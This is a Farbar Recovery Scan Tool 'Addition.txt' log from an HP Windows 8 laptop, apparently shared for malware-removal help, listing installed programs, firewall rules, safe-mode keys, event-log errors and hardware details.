AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
ĀµTorrent (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\uTorrent) (Version: 3.5.5.45395 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
888poker (HKLM-x32\...\{C70B2B8E-C7FE-46CB-9A5A-CCCFDB03649B}) (Version: 7.17.00033 - 888) Hidden
888poker (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\InstallShield_{C70B2B8E-C7FE-46CB-9A5A-CCCFDB03649B}) (Version: 7.17.00033 - 888)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.257 - Adobe Systems Incorporated)
AmericasCardroom version 1.17.45 (HKLM-x32\...\{1B17EB4E-3E9C-4611-B8B5-31C0A00A1F68}_is1) (Version: 1.17.45 - Winning Poker Network, Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version:  - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9840 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.59 - Piriform)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Free Excel Viewer (HKLM-x32\...\{AE305EFA-F22D-47E9-90C4-88FF9307BC34}) (Version: 1.0.0 - Media Freeware)
GOM Audio (HKLM-x32\...\GOMAudio) (Version: 2.2.21.0 - GOM & Company)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.42.5304 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.100 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
HP Documentation (HKLM-x32\...\{9BCC40C6-8A7C-4134-AF7D-9C2332E2DA80}) (Version: 1.1.0.0 - Hewlett-Packard)
HP System Event Utility (HKLM-x32\...\{7E9E39C4-3BD8-46E8-823F-A546A87E810C}) (Version: 1.1.12 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
partypoker (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\PartyPoker) (Version:  - PartyGaming)
PokerStars (HKLM-x32\...\PokerStars) (Version:  - PokerStars)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.30176 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
ShowMore Online Launcher version 1.7.7 (HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\{1484444C-6C76-491D-BDF4-F0DFC0891DE2}_is1) (Version: 1.7.7 - APOWERSOFT LIMITED)
Skype version 8.54 (HKLM-x32\...\Skype_is1) (Version: 8.54 - Skype Technologies S.A.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.29.0 - Synaptics Incorporated)
TeamViewer 14 (HKLM-x32\...\TeamViewer) (Version: 14.3.4730 - TeamViewer)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Amazon -> C:\Program Files\WindowsApps\Amazon.com.Amazon_3.1.1.1_x64__343d40qqvtj1t [2015-05-22] (Amazon.com)
Bing Translator -> C:\Program Files\WindowsApps\Microsoft.BingTranslator_1.7.2.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation)
Games -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.139.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
Getting Started with Windows 8 -> C:\Program Files\WindowsApps\AD2F1837.GettingStartedwithWindows8_1.5.3.1_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Drive -> C:\Program Files\WindowsApps\AD2F1837.HPFileViewer_1.1.12.59_x64__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Music -> C:\Program Files\WindowsApps\AD2F1837.HPConnectedMusic_1.1.0.162_x86__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Connected Photo -> C:\Program Files\WindowsApps\AD2F1837.HPConnectedPhotopoweredbySnapfish_2.3.93.3308_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
HP Registration -> C:\Program Files\WindowsApps\AD2F1837.HPRegistration_1.2.1.142_neutral__v10z8vjag6ke6 [2015-05-22] (Hewlett-Packard Company)
McAfee® Central for HP -> C:\Program Files\WindowsApps\2703103D.McAfeeCentral_3.5.125.1_x64__4ehj4w4frejdr [2015-05-22] (.-McAfee Inc-.)
MSN Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.240_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN News -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.4.213_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.4.244_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Travel -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.212_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.249_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
Music -> C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2.6.476.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
mysms - Text from Computer, Messaging -> C:\Program Files\WindowsApps\UptoElevenDigitalSolution.mysms-Textanywhere_2.3.1.1_x64__c9d6r4qvva5x8 [2015-05-22] (Up to Eleven Digital Solutions GmbH)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_2.7.0.18_x64__mcm4njqhnhss8 [2015-05-22] (Netflix, Inc.)
Skype -> C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1005_x86__kzf8qxf38zg5c [2015-05-22] (Skype) [MS Ad]
The Weather Channel for HP -> C:\Program Files\WindowsApps\Weather.TheWeatherChannelforHP_1.1.1.0_x64__t3yemqpq4kp7p [2015-05-22] (The Weather Channel.)
TripAdvisor Hotels Flights Restaurants -> C:\Program Files\WindowsApps\TripAdvisorLLC.TripAdvisorHotelsFlightsRestaurants_1.2.0.24_neutral__qj0v5chwq8f2g [2015-05-22] (TripAdvisor LLC)
Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.6.408.0_x64__8wekyb3d8bbwe [2015-05-22] (Microsoft Corporation) [MS Ad]
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001_Classes\CLSID\{D9AC5E73-BB10-467b-B884-AA1E475C51F5}\Shell\Open\Command -> C:\Program Files\Synaptics\SynTP\SynTPCpl.dll (Synaptics Incorporated -> Synaptics Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2014-09-15] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-09-20] (AVAST Software s.r.o. -> AVAST Software)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\TXE Components\TCS\;C:\Program Files\Intel\TXE Components\TCS\;C:\Program Files\Broadcom\Broadcom 802.11;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Live\Shared
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "DptfPolicyLpmServiceHelper"
HKLM\...\StartupApproved\Run32: => "HPMessageService"
HKLM\...\StartupApproved\Run32: => "SynTPEnh"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "Skype for Desktop"
HKU\S-1-5-21-4252122962-1682857245-3195559886-1001\...\StartupApproved\Run: => "uTorrent"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{DC516736-B1B6-4BC7-B4CE-E4F2A0A04E0F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{92487A26-BE1D-4072-8673-D72A48031CED}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{2F1E4741-FCDC-4112-B6C6-EE880C14B030}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F3830B62-C5F7-44E6-8163-3A7889349527}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3480DAA0-33A5-4694-B68F-DB262B4ACBC1}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
FirewallRules: [{BF816976-23E7-4C03-A6CE-C702B21A2D0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{953A6DCB-48B1-43A5-BD4E-C23BD8AD07F2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{07979F8E-05DC-4725-9D0A-6381CA944ECD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{A696B973-08D7-49CD-9D8B-04F2742CDB44}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{F23E9EDB-A226-42C9-9B92-CE2AABE38D5B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{A482FC95-FAA7-49DB-87FE-FE1A2A3AC10A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0FB38A11-4EC7-4E33-AB06-C0C7AEC27E77}] => (Allow) LPort=2869
FirewallRules: [{984F875A-8230-476A-ACF0-DA0F51A560CE}] => (Allow) LPort=1900
FirewallRules: [{6740BBFB-75A3-4180-9F62-1EF98C181F92}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{762AB279-939F-4B1B-AE19-13DB822BC00F}] => (Allow) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{BD76B0E5-B633-4EC2-9ECD-3E3617B1EF60}] => (Allow) C:\Users\JasonSt\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{0ACCE996-8C5F-44FD-8B75-EEA24D7DFF77}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D8AF2DDE-B885-42A3-BDA6-00AB4ACB6820}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{072D196F-43C5-4A49-BD8F-53C0C841AC70}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{97ECE254-219C-4460-A3F3-EC4AD0ADF583}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
==================== Restore Points =========================
28-11-2019 14:19:44 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
Name: USB Composite Device
Description: USB Composite Device
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service: usbccgp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: ========================
Application errors:
==================
Error: (11/29/2019 12:47:20 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET_64_2.0.50727" in DLL "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/29/2019 09:30:24 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/28/2019 08:06:19 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "BITS" in DLL "C:\Windows\System32\bitsperf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/28/2019 11:31:27 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (11/27/2019 08:59:33 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
System errors:
=============
Error: (11/29/2019 12:46:56 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 11:06:30 AM on ‎11/‎29/‎2019 was unexpected.
Error: (11/29/2019 09:29:53 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 10:40:19 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 08:05:31 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 8:01:26 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 03:30:35 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 3:12:20 PM on ‎11/‎28/‎2019 was unexpected.
Error: (11/28/2019 02:21:39 PM) (Source: DCOM) (EventID: 10010) (User: JasonS)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (11/28/2019 02:21:09 PM) (Source: DCOM) (EventID: 10010) (User: JasonS)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (11/28/2019 11:34:15 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll
Error: (11/28/2019 11:34:15 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll
==================== Memory info =========================== 
BIOS: Insyde F.08 12/26/2014
Motherboard: Hewlett-Packard 8023
Processor: Intel® Celeron® CPU N2840 @ 2.16GHz
Percentage of memory in use: 82%
Total physical RAM: 1939.04 MB
Available physical RAM: 335.41 MB
Total Virtual: 3347.04 MB
Available Virtual: 1568.59 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:21.37 GB) (Free:6.4 GB) NTFS
Drive e: () (Removable) (Total:7.39 GB) (Free:3.05 GB) FAT32
\\?\Volume{131776df-a79f-4219-ac20-29509132824c}\ (Images) (Fixed) (Total:7.37 GB) (Free:0.44 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: A136D194)
Partition: GPT.
==========================================================
Disk: 1 (Protective MBR) (Size: 7.4 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt =======================

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US